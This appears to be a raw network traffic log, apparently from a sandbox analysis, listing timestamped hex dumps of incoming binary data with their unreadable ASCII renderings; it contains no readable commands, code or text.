                                                                                                                                                                                    2023-01-05 07:58:37 UTC13105INData Raw: d8 e1 13 f2 b1 af e4 da 35 11 22 f3 ac 2d e8 af b7 40 82 e8 dc 91 53 85 24 50 28 95 f6 d1 34 b8 03 1a b6 af 4a a7 ae 6a 38 76 13 e8 aa 50 d4 1b 98 93 d8 6e 70 f9 7e 50 83 aa 8b 2e 20 7b 96 7a 17 d5 df 2e 86 ae 0a a3 2c 4e c1 2f 88 0e 6c 7a a7 86 c2 b6 bc 6a e3 e3 28 40 ae 14 63 cf ab 23 e2 a0 17 b7 10 fa 26 2f 94 3d 09 97 31 66 e1 2a 13 ed 6f cd 19 5f 37 f3 33 d0 85 a6 12 a4 4b ff d3 5a dc 6a dd ab b4 a5 33 16 34 2b 9e e0 35 aa 8d ff 76 b2 4a 23 20 5e 77 90 3f 59 f3 e0 af 1b 11 f9 57 b7 eb 8d f4 06 2c 10 5f 46 e0 c0 22 08 1b a2 de fe 8a ff 88 54 6d fc dd 09 c4 0a 9f af 57 02 0d 00 23 7b d4 61 f5 50 db f7 8d 91 cb 4e 03 3e 4d 50 d2 2e 78 c8 38 9b de 0d f1 af f9 3a 6c 19 27 6f e8 09 49 50 0f 74 c8 ee df 5d 98 d6 06 50 de 5e 20 17 25 8f 5d 7e 8e af 21 6b 48
                                                                                                                                                                                    Data Ascii: 5"-@S$P(4Jj8vPnp~P. {z.,N/lzj(@c#&/=1f*o_73KZj34+5vJ# ^w?YW,_F"TmW#{aPN>MP.x8:l'oIPt]P^ %]~!kH
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13121INData Raw: 1c 50 ed 3b d7 76 79 60 79 c7 66 84 cc 9f 12 13 37 a4 42 17 8e 6b 3e cd 33 ec 3b e0 fd 4a dd 4c 5c 13 e6 13 c9 78 a1 56 de 55 6d a7 87 13 68 69 2c a2 64 dd 09 c2 19 13 79 7c 30 69 9e 29 6c de ec 13 5b 75 e0 79 60 38 ed 67 29 ec 80 50 ad 54 88 2d 54 9d 77 ec 41 65 7a cc ab 8b ca 31 08 11 e9 fe 7d 5f 2a f5 b8 57 da e9 2c ac 66 41 b6 13 36 88 60 6a de 28 ee 34 0d 7f 76 00 64 00 51 37 6a a4 61 18 0b 52 eb 10 42 ef ff 61 28 da dd 56 0c 2a d5 9b d6 dc ba 24 0b 82 91 44 b0 3d b7 81 c7 8f 1e b6 ba 4e c6 90 fa 20 b2 3d a7 18 9c 84 ab f9 4a cf e0 b8 cc 89 cd a0 1f 00 da 7c 0f bb e6 77 ac aa da d3 d9 84 38 db 93 5b 54 eb 87 12 08 1e 19 22 22 3b 0c 7a 57 54 2b 30 b4 4e f5 05 54 3c 96 c9 4b 7b ab a1 ba 7a be 6f 86 3e b7 73 24 7b 49 85 5f 91 40 cf 0d 65 41 98 aa 7a 5f
                                                                                                                                                                                    Data Ascii: P;vy`yf7Bk>3;JL\xVUmhi,dy|0i)l[uy`8g)PT-TwAez1}_*W,fA6`j(4vdQ7jaRBa(V*$D=N =J|w8[T"";zWT+0NT<K{zo>s${I_@eAz_
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13137INData Raw: 86 4f 97 13 39 9e 11 ce 2a 6d 6b e3 2a af cd 5f c8 52 ab 8a 46 e9 4c 1c 28 9d 40 cb d7 68 3f 04 76 af 51 f2 6d 00 31 aa df c2 93 16 cd 27 a2 e5 66 6d d0 de 02 f4 a3 ba ec 9d c1 d0 d8 1f 06 f3 e6 47 10 58 6d 3a 2e df e6 c8 4b a3 aa 2c 40 26 de 20 87 0c b5 4c 53 7c 9f ad d3 21 26 06 d7 b3 51 8b cd 9d 71 e0 36 fc e8 b6 b9 43 90 be 8a dd ad f2 ca ad 77 30 d6 fe 32 22 f3 a9 25 5c a8 c6 d2 52 d3 dd 0c 7f 2e a9 50 f4 62 bb 3d 21 df e2 bc de dd 09 12 80 37 b8 4d da 98 22 6f df da 56 04 f6 18 de c5 f7 30 08 f4 c9 9f 5a 6a e8 c8 4d 1e f6 be 0e 64 87 52 2c a3 d8 04 3c f5 23 10 e5 ff 23 78 27 1b 7e a2 6c 4f f7 bf 8a 87 a5 fe 69 5c 5c ec a8 6c 5b d7 93 dc 75 5d 44 3a 64 bc 70 4f 17 bc f0 6a 4c c5 19 21 2d 8d eb de 84 b9 26 55 3d e0 35 b7 9a eb 87 a8 b0 27 78 c0 de d6
                                                                                                                                                                                    Data Ascii: O9*mk*_RFL(@h?vQm1'fmGXm:.K,@& LS|!&Qq6Cw02"%\R.Pb=!7M"oV0ZjMdR,<##x'~lOi\\l[u]D:dpOjL!-&U=5'x
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13153INData Raw: 15 4c ed 5d bd 56 f2 be 7d 80 7e 34 fa 87 f7 45 00 1b 89 5d ce bc 90 19 ab f5 37 85 00 e3 0e 21 bb 6e 21 7f 4f 40 58 bf 6b 56 8c 60 4d 52 4b b5 0d 14 6d 65 ef cf e6 44 7c e8 ac 0b e3 4c 24 1e 97 bd 69 7e 70 be 6d a9 08 8a 8a 62 f6 67 84 fc df cc 9a 5f 66 95 01 3b 4f 40 5d 84 b8 d8 84 9b fb 36 e4 5b 5b 6e 3f a3 c5 5e c5 b2 3d 3a 6d 63 5d b1 d6 4c ad 74 ed 9e bb b0 b3 9c 5f f5 c0 5b 9a 63 50 0d f9 1d 39 c1 bf db 0a ae 98 d4 76 5c 28 9a 42 c7 db e7 b7 ef 84 88 b0 f6 d4 88 e3 2d 74 4e df f7 3e 59 ed c9 eb ed 6f e2 e3 9f af f4 b0 b8 22 a3 c5 d3 60 ee ec c0 61 40 45 57 94 86 e2 ea fe 84 a3 01 46 49 df 17 9b 55 c6 4f f4 74 a3 a7 72 ae 3d 6d 47 b0 86 65 0f ef bf 46 5b c6 e5 66 51 15 9f e0 4d 59 0c 59 a2 e6 bb 87 21 3a a5 ea c8 05 01 48 79 e4 65 33 e0 a3 2d 76 b0
                                                                                                                                                                                    Data Ascii: L]V}~4E]7!n!O@XkV`MRKmeD|L$i~pmbg_f;O@]6[[n?^=:mc]Lt_[cP9v\(B-tN>Yo"`a@EWFIUOtr=mGeF[fQMYY!:Hye3-v
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13169INData Raw: bc 92 e2 4f e2 17 67 fb 27 97 92 71 7c 90 17 d2 7d 27 68 1b ca fc 9e 00 c5 0c 8f 77 e0 73 a5 35 02 09 e3 7e 86 6d f9 89 40 0d 16 ba ed 42 6a 9c 2c ce ac 2d 36 62 4e ec ae 79 b6 74 6b 25 5e 20 f8 6d e9 61 21 01 89 bf a6 32 52 9e 87 e8 76 30 11 46 1f c6 64 40 f5 14 ff 46 df d7 7f 93 1b 39 82 55 0e 9e 61 0d 12 9e 09 31 d3 8b 9c 6a 1c e4 ee e6 43 e8 48 8c 39 cd b7 42 9a 0d e3 cb 20 b2 84 27 83 0b 27 ee 8f e4 55 f8 39 f8 98 d9 eb 91 bb d1 ab 4d 5f f6 a9 66 9c 6c 55 3a d1 cb 7d 54 95 38 03 6a f6 14 d0 60 c5 80 56 b7 d4 d5 79 ef b9 21 27 4b 20 77 ba 7c 3d 23 80 56 35 4c 98 7c 44 7e 44 64 ac cb 96 b1 30 68 f0 58 d9 df 41 7a f5 e4 45 7f 51 12 fc e4 de 28 2c ce 4d b7 64 63 58 50 98 2d 3c 42 73 8e e5 d0 23 cf e5 ff 54 4a 90 25 3c 5a b2 25 75 c3 37 17 f7 fd 4b a3 ab
                                                                                                                                                                                    Data Ascii: Og'q|}'hws5~m@Bj,-6bNytk%^ ma!2Rv0Fd@F9Ua1jCH9B ''U9M_flU:}T8j`Vy!'K w|=#V5L|D~Dd0hXAzEQ(,MdcXP-<Bs#TJ%<Z%u7K
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13185INData Raw: 71 b4 37 10 b5 76 fe 9a 74 64 aa ef 4a 32 b9 dd 84 1e 86 fd 17 8e 68 72 35 af 3c 82 5b 64 f5 86 78 7f b2 83 87 2c d3 7f 17 3b 5d 42 b2 77 75 d7 dd 81 89 c5 fa 10 39 ef 06 96 5d 8d bd 1f 07 bf 6e 39 a2 83 5d 2d 64 c9 f3 7b eb 40 49 ff 43 df da e7 bb 0c ab 89 01 6a 31 02 44 31 5b 07 85 de f8 f8 5f 86 07 0c 0c 2f 7a 85 52 0a 6f 46 2d c1 e0 93 9a af f2 a5 2e 19 4c 62 a8 4c 08 c1 b2 a6 d5 c5 4d 40 51 6a 05 14 45 ef 98 2a 14 f2 58 36 84 18 9d e6 6f 4b 8b 02 c0 35 de 62 33 3d ba 09 06 a7 42 af 4a 80 cb 79 ff 51 1b 75 db d3 13 9b ff a9 66 72 cf 81 94 65 ed 8e f9 90 63 a2 6a 3c e5 cd 19 08 50 04 8e 71 ae fe 92 33 4c 42 73 10 2b 91 54 54 cc fc 0b fa 40 a3 14 03 1c 9c b6 96 93 f6 3b 4f 09 89 ed 22 58 ff 90 5f a8 d2 eb de 48 6f c2 e4 ff d0 c4 5f d6 80 16 7e 02 0a db
                                                                                                                                                                                    Data Ascii: q7vtdJ2hr5<[dx,;]Bwu9]n9]-d{@ICj1D1[_/zRoF-.LbLM@QjE*X6oK5b3=BJyQufrecj<Pq3LBs+TT@;O"X_Ho_~
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13201INData Raw: d2 e7 08 65 c4 65 67 ed e4 87 5c 04 da a1 3b 1f c9 96 8f 8d ab 2a 19 47 5a bf ee 79 33 05 7e 68 37 20 85 87 83 b7 12 75 b9 f1 7c 07 57 51 2f df 4d b5 56 2f ec 08 c2 3a 33 7e f7 67 5a 15 a2 1a 21 5c 45 8d 43 31 b0 8a 46 ca de 41 72 47 b4 6d ac 89 e4 63 8b aa 24 64 f8 4b 12 6b df 4a 1e 16 c9 3c 19 38 07 f0 22 f0 ea 60 a8 e8 d1 cb 5a 95 e7 cb c3 84 3b e3 2c 7b 13 81 89 af 6b c7 d0 19 94 79 8f 79 6b 43 3d 64 4d 9a 4a 3d 00 7d 0c 35 b5 f3 af 54 ca 04 88 8b 00 97 6a 95 78 95 31 18 d7 57 5e 9b c7 18 8f 0d 68 00 87 7b cc 32 05 ce 9c d1 68 1e 76 bb 28 02 73 f1 6d f7 4b 80 95 19 a0 9a 29 33 b9 d1 3f 9c 69 60 a6 4f ba 52 d4 78 b5 86 9f e3 8f 8e c2 e7 5f 8b 33 0f a6 8e cd 81 9e 77 5a ba 23 7a 84 00 a6 1d 75 f2 5c 9a 80 4a cb 63 c1 fd 4b b1 a6 11 48 ef 20 4d b5 02 2c
                                                                                                                                                                                    Data Ascii: eeg\;*GZy3~h7 u|WQ/MV/:3~gZ!\EC1FArGmc$dKkJ<8"`Z;,{kyykC=dMJ=}5Tjx1W^h{2hv(smK)3?i`ORx_3wZ#zu\JcKH M,
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13217INData Raw: 02 9d 95 e3 04 63 35 45 2a bd c2 4e 27 b8 bf 1b 2b e9 26 0d ea d2 22 1e e0 e9 d7 df d3 8b c0 b5 35 5b 71 7d 72 b3 63 b8 76 76 0a d1 c2 a9 f0 05 0b f8 e1 49 48 bc a8 78 9c 6f 7d e3 1b e6 7c 41 94 6a 6f 4c d7 c9 ea 07 86 4f cf c5 74 bb ef 6b 97 e2 7d 21 31 f3 63 7c da b5 79 ca cc 40 44 db 38 d6 d8 64 bf 89 c4 11 75 06 a9 ae 3d 2d 4c 17 ff 87 44 b4 40 60 24 c9 d0 a8 1d 89 03 38 8a c5 2d d2 dc 0d f6 f0 cc f1 f6 4c 38 aa 31 a5 49 80 32 f4 58 8d ad 53 14 27 51 37 05 6d cb 86 f7 b1 6d 34 00 fc aa d3 f0 fd 94 af 73 59 be b1 b5 4c 86 a2 34 07 b3 bd f5 df 72 51 2f f2 35 c7 6d 28 ab cb 23 c3 91 74 72 03 a9 a6 c6 0a 08 b2 92 cd a5 60 da 68 59 18 fd 5e 53 d3 91 b7 98 e2 5e 44 4a 49 31 d4 cd 29 f2 ec 56 25 67 a5 3b 33 8d 36 d5 4d 78 9f 1b aa 4a 84 3c 8a 66 5b 3d db f6
                                                                                                                                                                                    Data Ascii: c5E*N'+&"5[q}rcvvIHxo}|AjoLOtk}!1c|y@D8du=-LD@`$8-L81I2XS'Q7mm4sYL4rQ/5m(#tr`hY^S^DJI1)V%g;36MxJ<f[=
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13233INData Raw: 69 fb 9e f8 30 71 71 50 48 0c 07 c2 62 61 ea ee e7 af 49 06 59 79 27 d7 70 1c bb 50 b3 5d 19 eb 63 ba 1d 7e e1 33 a5 9f 01 83 92 6f 22 84 4d 60 41 b7 32 83 bd 38 17 9d b1 36 60 ba d6 7c c1 ef 3f 9c 0b c7 0c 94 06 83 0d ab c6 7b f1 21 f8 fd 1e 83 0c 9b 9e 7c f0 7b 49 5e 9a 7c 54 fd d7 92 18 8d 65 6a 4d 83 16 3c f8 be 14 1d b3 5a 11 7c 27 1a f0 5d f4 77 6b 73 15 83 37 f5 c9 88 0c ac 13 9d f3 7c 68 0e ed 42 4e f8 86 06 84 b3 00 f9 83 90 62 00 70 40 17 ef 89 54 30 63 06 0c ff 09 98 05 a7 aa 97 04 c9 44 75 8d a9 be 4a a6 a3 5f 58 01 31 00 a9 61 3e 1d 4f 07 1c 39 d2 34 02 03 0b fc 32 81 07 4a 82 9a 0d 7a 24 1b ac fa 7a ef 7b c5 e7 16 9e f9 c4 59 ed 93 98 8a 89 e5 ac 08 ee 1f 7c 47 72 65 d3 6f fb ff a6 a9 f8 94 8f 0a 8e 44 b4 05 fa 52 74 81 6e a5 54 a6 c2 10 57
                                                                                                                                                                                    Data Ascii: i0qqPHbaIYy'pP]c~3o"M`A286`|?{!|{I^|TejM<Z|']wks7|hBNbp@T0cDuJ_X1a>O942Jz$z{Y|GreoDRtnTW
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13249INData Raw: 51 6c 5a cd 6b b4 e6 cd 83 17 38 ee 12 5c a8 4f 10 4f fb 0b 99 7d 8c 51 0c 52 d5 54 19 50 4e 61 14 5e 0a f3 05 f5 ad b6 ff 82 92 62 7c 77 8c dd 71 f8 45 df 50 2c 54 89 da 41 b3 2c 40 52 ae 60 3e 8a 5a aa 72 b7 be 12 33 bc 68 77 48 19 74 d6 a9 09 1a 36 c3 32 a6 ce f3 5c e0 04 e1 72 52 8a 68 fb 5a fa 0f 53 9d 34 2b 75 78 a0 50 cb f8 cb c5 f7 6e 8a 8b 3a 46 f1 02 12 47 ba 62 75 5d 25 29 2e ea ba 60 80 af 89 53 2a 30 16 47 9e 91 14 38 88 b6 50 97 36 b8 4f e3 b8 99 78 b9 13 d0 4a 02 28 6b a5 ad 88 42 6f 04 0e f8 c2 02 e0 80 77 40 4a 45 15 06 a5 e8 4e b8 87 75 00 76 00 64 00 1a e6 31 a8 e2 e8 83 50 79 00 21 b8 27 fc 69 12 f2 fb 9c 3b 92 77 57 27 9e 00 fd d6 ea c1 f4 78 9a d8 32 22 fa 99 a7 c3 9c d1 7e 5a bb ed 42 a9 40 94 a5 00 3d 6c cc a1 03 b1 c6 93 9f 2b bd
                                                                                                                                                                                    Data Ascii: QlZk8\OO}QRTPNa^b|wqEP,TA,@R`>Zr3hwHt62\rRhZS4+uxPn:FGbu]%).`S*0G8P6OxJ(kBow@JENuvd1Py!'i;wW'x2"~ZB@=l+
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13265INData Raw: 98 85 48 10 c2 8b 84 06 77 34 5c 46 60 b5 45 73 89 85 66 87 39 41 ae 0f 85 d5 93 f2 d3 f4 76 40 22 e0 90 f7 12 88 94 6c 54 c7 57 0f 77 08 af 38 f3 64 51 9f 72 05 73 24 87 93 7a 37 5a d4 25 e1 25 b6 83 7a b9 4c 8a fb fe b2 a2 ad 06 95 26 0a 8c f2 ac cd 23 82 de 7d a1 f3 67 09 29 2b 84 65 86 3a c0 fa 54 33 f4 a1 63 00 64 00 f2 09 58 0a 22 cd 19 47 27 02 7a 96 84 04 b5 99 ef 72 65 19 25 13 8b 0a 0c 2a 29 00 70 00 68 40 7c b6 e8 8c c1 91 81 01 77 00 e4 02 30 f2 2d f5 18 2e 9b 65 0a e2 bc de cd 1e e2 a9 61 45 0e 00 62 f4 17 7b f5 fe b8 ba bd 87 c7 1a e9 ce b0 f2 2f 9a 6e 55 09 1b fe 6d 4c 5c 1c 45 e7 54 13 ed 0d 38 13 34 83 65 ed ca 66 e4 12 23 fe f2 a3 ba b4 1b f6 1b 35 e1 d8 3b 88 65 6d ef 37 e7 10 e8 63 14 88 3f 4a bf 93 ec bc 6c 59 a4 7b 69 2d a3 34 ec cb
                                                                                                                                                                                    Data Ascii: Hw4\F`Esf9Av@"lTWw8dQrs$z7Z%%zL&#}g)+e:T3cdX"G'zre%*)ph@|w0-.eaEb{/nUmL\ET84ef#5;em7c?JlY{i-4
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13281INData Raw: 48 23 01 37 89 3f cf 18 b5 1e b0 0f 60 30 76 c0 7f af 6d ed 4a d6 84 a6 9c 3f a2 d6 95 0a a2 d7 81 0b 83 3f 99 0d e6 f9 0e 05 15 bd 83 3f b3 92 2b fd 0d f7 50 e7 6f c0 ee d7 d9 dd 53 03 a4 5e 8d a4 34 d8 98 b0 8e b6 a9 f2 74 e2 a3 8a 30 c9 9b 6b 40 f7 6d db 61 01 fe 68 44 5a de 13 6f c1 fc ed 8a 1f fe 15 cc 1d c4 7d e0 65 e4 40 e5 c2 10 58 d5 ee b7 32 95 44 ae 6d e8 12 3c 0a 7f c3 2d e9 61 1d a5 b6 52 62 af 6f 2b a3 f3 0a 29 67 ff 1a 0f f4 8a a2 4a 50 c0 14 97 40 af e7 81 4c a1 41 7e 01 b0 f4 19 14 8d 3f 33 6e 2c 06 d7 2f b0 45 06 90 6c 3e b7 3f 93 b9 b0 15 ca b4 82 e9 48 7b 6d c2 ba 7f eb 77 08 be 46 42 e7 fa 50 7c 7d c0 0c c7 ce 7d f7 cc 49 e9 11 64 78 7f d6 c3 8f d6 bf 26 9f ff 8f ff 18 b9 34 80 af 04 68 c7 16 2f 9c 24 63 0b 6e a9 28 78 aa 8c 0f fd 4e
                                                                                                                                                                                    Data Ascii: H#7?`0vmJ???+PoS^4t0k@mahDZo}e@X2Dm<-aRbo+)gJP@LA~?3n,/El>?H{mwFBP|}}Idx&4h/$cn(xN
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13297INData Raw: 50 48 65 1a 39 fc d9 0c d3 cc 2a a2 4b d0 be d9 f7 16 b5 22 ef d7 cb 5e 35 4c 10 3d 4e 59 24 67 79 c4 09 a6 13 11 b5 5d 24 ad e1 fb d0 a5 ec 8d 55 09 b9 b0 81 ff 8d ff cd b5 e6 a8 33 2e b6 61 36 40 da ec 72 a8 ce 3a 85 bb 0b bc ce 26 7c 1a 26 39 76 36 c9 43 73 be 16 b0 72 58 f8 f9 c9 bb 8b 09 d5 6e 8e 7f 4a d2 06 44 4a ef 0f a3 34 85 50 35 df 43 28 1e 7c 5c 32 bc 6e 3a d3 bb b3 3a aa 76 cf 44 49 37 32 44 2c b6 38 b8 27 21 4c 18 9b 43 f2 f5 f0 a7 d3 76 c1 83 02 30 5c 66 48 0d 4e f4 12 33 ff 2f 51 1d a2 82 57 36 93 c0 31 4a ca 22 0c cd a4 68 2d 3f d9 94 0a db f7 12 87 9f bc c6 2a d8 7f 9b b2 e2 d6 da cb 3c ca bb 0d 68 4f 5d 22 c2 57 c3 62 49 e4 38 be 72 a0 3b 62 3e 08 8f 01 b5 5a bd 38 dd 5e c3 50 71 58 14 a9 42 d7 50 e2 3b dc 0d 32 82 4f bd d4 ac a7 3b 2f
                                                                                                                                                                                    Data Ascii: PHe9*K"^5L=NY$gy]$U3.a6@r:&|&9v6CsrXnJDJ4P5C(|\2n::vDI72D,8'!LCv0\fHN3/QW61J"h-?*<hO]"WbI8r;b>Z8^PqXBP;2O;/
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13313INData Raw: 00 19 38 c1 4a 74 aa 50 25 dd 9a 88 d8 74 d7 2b 14 50 50 34 7f d1 20 c1 ff 18 ec af 95 d8 3d 00 25 8d ed a2 e9 7e 6f 59 30 c3 04 8e 15 2c ab 98 6f af b6 3c 72 07 38 00 b4 c2 4f 9f aa c3 7b 61 22 e3 4c d4 fc b6 aa 3c f7 76 5f 36 b6 91 17 58 5a c3 0e b9 35 39 a1 39 a0 0c 51 c3 75 4d d3 ee 0d 3e 8b 5a a0 3c d6 24 e2 3a f1 53 7d 72 8b 3c 42 f3 d3 23 4b e3 a1 2c 7b 5b 69 c8 27 8c 41 23 e7 e4 e8 c8 ae ef 62 9b 6e d9 e6 73 fd b4 4a 5a f7 74 86 1f 17 01 65 66 5c 10 05 95 64 1b 75 f8 04 32 21 40 50 90 d0 e3 ce ac e7 ff cd ff f5 2d 81 66 a4 f0 ca 81 9a 74 85 aa e0 00 77 00 dc 59 83 97 72 a8 a1 9a c9 49 51 0d dd aa e6 27 8b 40 85 69 20 8c 08 9c cb 35 37 ba 33 e6 30 67 39 a4 5a d8 a2 6f d2 5a 48 b3 9a c2 8b 45 dd 12 41 7a 47 45 1a ff 97 ff b4 24 27 c7 0d 67 01 5b 57
                                                                                                                                                                                    Data Ascii: 8JtP%t+PP4 =%~oY0,o<r8O{a"L<v_6XZ599QuM>Z<$:S}r<B#K,{[i'A#bnsJZtef\du2!@P-ftwYrIQ'@i 5730g9ZoZHEAzGE$'g[W
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13329INData Raw: 57 43 eb 9f 65 d6 eb d2 b6 68 23 14 37 e0 71 5d 9c eb 93 f7 ec 1b be 04 57 16 c3 60 2a 45 7d f4 fe 5c 1c 69 81 58 9f 3a d2 7b 69 12 66 f4 21 38 92 96 4a 53 e3 98 be 99 8d ba 78 1a 5d 7c 3d f8 58 a2 6d 21 fe 74 3e 62 1b ea 8f 1d 3b f6 23 bf 2a f9 6b ab f4 63 fa 7a f0 55 03 09 36 8a 3f 9f 72 65 5f f0 82 5b 05 4e 15 87 00 c2 c7 61 49 b3 89 15 3c 3d 74 bf ee ae d4 85 8b 5f 5d f9 19 af d7 93 ba 4e ad a8 47 a6 c0 9d 8e f4 13 da c4 7b a2 b1 17 13 fd 65 29 62 17 3f 3f 8c d1 9e c4 5b f7 67 52 36 df 9d 4a 83 09 d9 c4 e9 aa 40 d2 15 f1 af d9 9e a5 a3 9e 57 3f 1a 95 a6 51 77 7c 86 c3 62 40 18 b3 28 7e 8a d0 83 a3 ea 26 bc 13 ca 7c 96 77 00 9c ac 30 ea 3b ad 9c 76 cc ff dd 00 b2 20 3c 4b 1a 56 4a 4b 50 62 a4 bc 31 2a 62 ee 90 16 cd 27 82 25 40 4e d0 dd 9a fe 5b ab 2e
                                                                                                                                                                                    Data Ascii: WCeh#7q]W`*E}\iX:{if!8JSx]|=Xm!t>b;#*kczU6?re_[NaI<=t_]NG{e)b??[gR6J@W?Qw|b@(~&|w0;v <KVJKPb1*b'%@N[.
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13345INData Raw: 8f 2f ef 75 c9 54 74 48 21 b4 fd 58 48 24 c7 05 f3 37 ca 3b e3 de 2e b9 67 2d f4 9b 5d 13 47 4c b4 d4 94 6e aa 17 10 3c a5 83 1f e5 dc 80 82 06 9e 54 47 99 97 2f d4 db ca 37 d4 0c 49 ec 76 bf 3e d6 15 2f bc 4b 65 06 0a 07 a6 c5 9c 56 2d fc b5 1c e3 93 dd 17 db cb 5f 03 a1 e3 6a 9b f1 de cb 65 69 54 aa 6b 16 fe a9 cc 1d 86 7c 2a fc 0e 8f 56 8c 67 db 3e 70 03 7a ef 72 04 22 c1 47 eb 52 14 c0 d7 a1 07 8b a6 45 95 79 62 85 56 6b b3 78 70 a1 bf e9 ab 62 b7 e9 37 ad 76 27 9d 1f f1 c1 9b 0a 2c 20 6d ea 77 e8 e8 59 82 fe 75 2f d8 0a 5e 81 38 de 5f 78 c7 c6 09 69 67 de 63 f1 9c e4 40 72 9f 33 31 d8 ab d2 54 b5 90 4f 57 80 53 c1 7d e6 eb 43 43 d7 04 ec 28 6a 04 e8 38 24 a9 ec aa f0 8b f9 93 41 02 dc 4b ec 80 36 0d fe 6c a8 b9 74 b4 3b ce 65 0d 0f d4 76 f5 92 b3 f6
                                                                                                                                                                                    Data Ascii: /uTtH!XH$7;.g-]GLn<TG/7Iv>/KeV-_jeiTk|*Vg>pzr"GREybVkxpb7v', mwYu/^8_xigc@r31TOWS}CC(j8$AK6lt;ev
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13361INData Raw: 06 fa 37 4c 09 b4 34 2b e5 d0 24 4e 22 fe d6 3d 8f 6f ea f2 80 94 bc 60 3e 0c 1b 01 29 7b 68 25 c0 f9 47 0c 6d 38 53 ee 9b 49 b5 cd fb f3 54 1a 97 09 7b 24 07 c7 00 0c 24 c9 9f 73 7c dc 9b 96 9c f3 7e 2e 42 01 79 fd 7d d7 14 0c e6 73 50 f0 91 d6 69 5c ec f3 4e 5a 8c 8a c2 e7 5d 21 66 0c 3d c6 bd 73 3e 65 e8 e0 86 f3 dc 63 b6 8d 84 16 72 b6 aa 03 f9 cc 7a 02 b3 7e 5f ac 2e 1a c2 b7 48 bf 9a b1 d1 e9 69 e5 d3 e0 31 bb 4d d6 20 a3 82 ed b9 11 dd 16 db 96 73 07 be 29 e7 bd dd 5c b1 69 ef d6 1a 29 4d 26 2e 5d 7c 0b 0f a5 6c 9f 1f 35 73 b3 ad 3c 98 ce 24 3b 25 fe 35 a7 b5 d8 c8 a8 2c f7 1b 0a 3a 4f 26 1d 3c 43 9e 15 74 58 9b 36 19 a8 87 46 d3 e8 5a ca dd 3f c4 f4 8b 50 b5 f8 e8 21 ed 51 ad 05 e1 47 a2 af 05 99 0e 30 89 64 a9 ac 0e ad 44 26 e0 95 79 e3 bc a9 0d
                                                                                                                                                                                    Data Ascii: 7L4+$N"=o`>){h%Gm8SIT{$$s|~.By}sPi\NZ]!f=s>ecrz~_.Hi1M s)\i)M&.]|l5s<$;%5,:O&<CtX6FZ?P!QG0dD&y
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13377INData Raw: 81 22 86 4f d3 cc aa 81 9f 5f a6 95 2f d7 e8 87 47 40 ad 59 9b 00 04 ae 6d 11 fe db 81 34 bf 04 81 c7 14 25 d5 5f ef b1 c9 dd 26 6e 54 a4 ab 9a f9 02 35 84 48 c3 0b ea 67 d2 18 ea c5 d9 e1 98 85 4a 83 04 74 ef 2c db 10 1b 64 99 c3 a4 e9 49 b9 ca d3 ff f2 ec 25 2a ad c6 8f 76 8d ff c8 00 c5 56 39 74 d9 62 55 b0 2d 35 6f 82 db 95 b2 a0 74 e9 8c 27 97 25 f5 68 35 22 db 49 10 bd 53 c0 b8 66 dd 22 33 66 2c 4c 93 81 4f 46 8b dd f8 2e 10 b4 b9 17 5c 63 93 1f 7e b9 57 49 4a 2e 06 89 27 df 1d 52 fe ad aa 80 b7 95 d7 20 18 ce 00 42 51 14 8f 1e cc 21 d5 d4 3d bd 57 bd cf 2e 2a e0 b1 56 1e b8 bf 57 a0 0d de dd a6 e0 7e a3 2e a0 6a 4d 3c 22 20 02 e3 d5 9a 77 6c b2 8c 1c 8d 68 1a 03 59 c8 8a da b6 6c 5d c6 3c 54 ab 1f 98 51 c9 6d b0 59 fa 5b b0 3b ec 1a c2 97 50 eb 75
                                                                                                                                                                                    Data Ascii: "O_/G@Ym4%_&nT5HgJt,dI%*vV9tbU-5ot'%h5"ISf"3f,LOF.\c~WIJ.'R BQ!=W.*VW~.jM<" wlhYl]<TQmY[;Pu
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13393INData Raw: 3d cf 04 41 f5 f5 9d 81 b4 34 22 62 0e e9 fe 04 64 00 8d c8 69 0d 32 57 a1 66 31 0f de 10 33 8a b9 49 12 c5 83 d1 36 8a 2c 02 33 1b f1 49 e3 e8 76 00 68 00 a1 e2 11 41 b8 50 7d 66 36 0f 2e c3 14 40 3d be a5 86 b4 9c 0e 0f c9 f8 c0 c0 d1 0c b5 c0 a5 41 eb 00 3a c1 e2 e7 23 0f cd c4 29 8b 71 49 f6 c2 35 00 75 00 8e 40 5e c4 33 33 f1 c1 a2 03 99 9d ce 11 73 41 80 db c8 f8 34 81 b4 30 69 9d 2e f8 cb 41 b3 cb 35 84 a4 f5 9a 91 18 07 31 45 fe 1a 36 8b 36 04 14 0f 91 c8 26 3a 89 49 e9 ea 77 00 77 00 79 63 b3 66 a4 e8 25 f7 a1 49 b3 fa 3b 57 d6 71 67 4c b1 0d e4 1c 73 29 82 d2 3f f7 bc 44 51 da 77 89 38 08 ec 40 e8 fc 51 66 b6 f0 cd 41 fa 02 36 0a a5 66 e2 0f f2 c0 2b 81 99 04 68 00 73 41 fc 01 c4 44 4f d9 44 c7 8d 27 c3 03 32 41 e9 28 31 8a 20 04 15 0f dc e8 3e
                                                                                                                                                                                    Data Ascii: =A4"bdi2Wf13I6,3IvhAP}f6.@=A:#)qI5u@^33sA40i.A51E66&:Iwwycf%I;WqgLs)?DQw8@QfA6f+hsADOD'2A(1 >
